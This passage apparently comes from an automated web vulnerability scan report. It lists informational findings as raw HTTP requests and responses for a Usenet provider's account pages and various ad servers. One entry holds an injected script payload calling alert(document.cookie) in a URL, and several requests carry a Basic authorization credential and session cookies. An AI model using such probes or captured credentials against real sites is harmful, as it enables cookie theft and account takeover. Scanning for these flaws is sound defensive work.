Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=DHtHt0lU_TcSG.zKACw1yemKopp0oWW0L4d3d921d

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:52:29 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=xKCQsCCPCUppgX7z_Q9C4emqopp0oWW0L4d3d922d; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17318

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Referral Credits</TITLE>
<script src="/referrals.js"></script>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#265
...[SNIP]...

30.17. https://acc.newsguy.com/user/-/referrals_cashout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/-/referrals_cashout

Request

GET /user/-/referrals_cashout HTTP/1.1
Host: acc.newsguy.com
Connection: keep-alive
Referer: https://acc.newsguy.com/user/-/accnt_flash
Authorization: Basic aDAyMzMyOkZhc3QxRGlh
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=obHFXmnhMbJX5LfJRNZRWemqopp0oWW0L4d3d924f

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:10 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; path=/; domain=.newsguy.com;
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3297

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Account Administration - CashOut! Referral Credits</title>
<meta NAME="description" CONTENT="Automatically read, post, de
...[SNIP]...

30.18. https://acc.newsguy.com/user/accnt_overview

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_overview

Request

GET /user/accnt_overview HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=.NtkeVYzZQxxA.BCeif7Dem4opp0oWW0L4d3d944f; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Overview</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftma
...[SNIP]...

30.19. https://acc.newsguy.com/user/accnt_renew

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_renew

Request

GET /user/accnt_renew HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=H7MjtTwyFzdgi1ol1ako0emqopp0oWW0L4d3d9453; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Renew Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" leftmargi
...[SNIP]...

30.20. https://acc.newsguy.com/user/accnt_settings

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_settings

Request

GET /user/accnt_settings HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Settings</TITLE>
<script src="/accnt_forms.js"></script>
<script language="JavaScript">
<!-- calculate available quotas by values type in
...[SNIP]...

30.21. https://acc.newsguy.com/user/accnt_signup_usenet

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_signup_usenet

Request

GET /user/accnt_signup_usenet HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=dLOXayhNSH0bYlx_7dbu1emqopp0oWW0L4d3d9459; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Add a Usenet Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" le
...[SNIP]...

30.22. https://acc.newsguy.com/user/accnt_upgrade

Summary

Severity:   Information
Confidence:   Certain
Host:   https://acc.newsguy.com
Path:   /user/accnt_upgrade

Request

GET /user/accnt_upgrade HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=F1xwYpJIfeFc7m0gMa_onemKopp0oWW0L4d3d9456; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Upgrade My Account</TITLE>
<script src="/accnt_forms.js"></script>
</HEAD>

<body vlink="#26589E" alink="#26589E" basefont="3" topmargin="0" left
...[SNIP]...

30.23. http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5875.270604.B3/B5111946.91

Request

GET /adi/N5875.270604.B3/B5111946.91;sz=120x600;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1049
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 25 Jan 2011 01:35:44 GMT
Expires: Tue, 25 Jan 2011 01:35:44 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,009 Template Name = Image Banner - Open in New Window -
...[SNIP]...

30.24. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CDJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=D5990400-1924-8254-0209-118000C40100; PRca=|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 6312
Set-Cookie:PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

if(!window.prRefs){window.prRefs={}}window.prRefs['AC931A6999-1254-44BB-9596-52F9E99E7F03']='%3C%3Fxml version%3D%221%2E0%22 standalone%3D%22yes%22%3F%3E%3Cprdata%3E%3Cviewcount%3E%3C%21%5BCDATA%5BAH0
...[SNIP]...

30.25. http://adserver.teracent.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"54-1294718145000"
Last-Modified: Tue, 11 Jan 2011 03:55:45 GMT
Content-Type: text/html
Content-Length: 54
Date: Tue, 25 Jan 2011 13:05:11 GMT

<html><body><! Oops, we have a error--></body></html>

30.26. http://api.tweetmeme.com/url_info.jsonc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Request

GET /url_info.jsonc?url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&callback=aptureJsonCallback1 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 21:11:44 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 400
X-Served-By: h02
Content-Length: 76

aptureJsonCallback1({"status":"failure","comment":"unable to resolve URL"});

30.27. http://b3.mookie1.com/2/B3DM/DLX/1@x71

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Request

GET /2/B3DM/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660; Dominos=DataXuB3; RMFM=011PhXovU106w2; session=1295919344|1295919347

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 783
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var ZAP_id=cookie_c
...[SNIP]...

30.28. http://b3.mookie1.com/2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90

Request

GET /2/DataXuB3/Dominos/11Q1/Opt/120/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html?rtbhost=rts-rr14.sldc.dataxu.net&btid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkV8ZWMxNTA4OWUtNjFiYi00Y2FmLTkzZTItNTIwNGU4NTNlZDI3fDEyOTU5MTkzNDM3NTl8MXwwRmVYbGtHVmN4fDBSdzZxY0xjbW98ODg5NTY1MzE3fA&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TT4o7gABkFsK5WfYIOdxvqDxBisV1iCr7MNZGg&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZlWGxrR1ZjeA&ciu=MFJ3NnFjTGNtbw&reqid=NEQzRTI4RUUwMDAxOTA1QjBBRTU2N0Q4MjBFNzcxQkU&ccw=SUFCMTkjMC4wfElBQjE1IzAuMHxJQUIxOSMwLjB8SUFCMTUjMC4w&epid=&bp=158&dv=&dm=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fjoomlacode.org%2Fgf%2Fproject%2Fjoomla%2Freporting%2F&refurl=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 508
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="Dominos=DataXuB3;expires="+B3d.toGMTString()+";path
...[SNIP]...

30.29. http://c5.zedo.com/ads3/i/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /ads3/i/

Request

GET /ads3/i/ HTTP/1.1
Host: c5.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZEDOIDX=29; PI=h749620Za886284Zc305002290%2C305002290Zs788Zt124; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=305,2290,9; ZFFAbh=749B826,20|1483_749#365; FFad=0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 1041551373
Expires: Mon, 24 Jan 2011 22:30:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 22:30:23 GMT
Content-Length: 30
Connection: close

<HTML>
<BODY>
</BODY>
</HTML>

30.30. http://c5.zedo.com/jsc/c5/ff2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c5.zedo.com
Path:   /jsc/c5/ff2.html

Request

GET /jsc/c5/ff2.html?n=305;c=2290/2289/1;s=788;d=9;w=300;h=250 HTTP/1.1
Host: c5.zedo.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFgeo=5386156; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1; ZFFAbh=749B826,20|1483_749#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Last-Modified: Wed, 29 Dec 2010 10:51:29 GMT
ETag: "2f6871-8cf-4988a59f54e40"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
X-Varnish: 1882681756 1882646842
Cache-Control: max-age=204814
Expires: Thu, 27 Jan 2011 06:48:20 GMT
Date: Mon, 24 Jan 2011 21:54:46 GMT
Connection: close
Content-Length: 2255

<!-- Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

30.31. http://cdn.apture.com/media/html/aptureLoadIframe.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.apture.com
Path:   /media/html/aptureLoadIframe.html

Request

GET /media/html/aptureLoadIframe.html?v=21531601 HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=nbrlsqWMpk

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:11:41 GMT
Server: PWS/1.7.1.2
X-Px: ht iad-agg-n30.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 29 Jan 2011 02:07:22 GMT
Age: 241459
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1242
Last-Modified: Sat, 22 Jan 2011 02:03:16 GMT
Connection: keep-alive
Content-Length: 1242

<!--
This is the page which handles fetch/load of localStorage
-->


<!DOCTYPE html>
<html>
<body>
<script>apture=window.apture=window.apture||{};aptureCache=apture.fileCache={};aptureCache.lo
...[SNIP]...

30.32. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.cloudscan.us
Path:   /examples/html/sql-injection-xss-cross-site-scripting-dork.html

Request

GET /examples/html/sql-injection-xss-cross-site-scripting-dork.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=942-1294338785785; __utmz=108330077.1294765608.4.2.utmcsr=cdn.cloudscan.us|utmccn=(referral)|utmcmd=referral|utmcct=/redirect/; __utma=108330077.350499926.1294008031.1294765608.1294772434.5

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Tue, 25 Jan 2011 00:56:35 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

30.33. http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0Rw6qcLcmo_34070076.html

Request

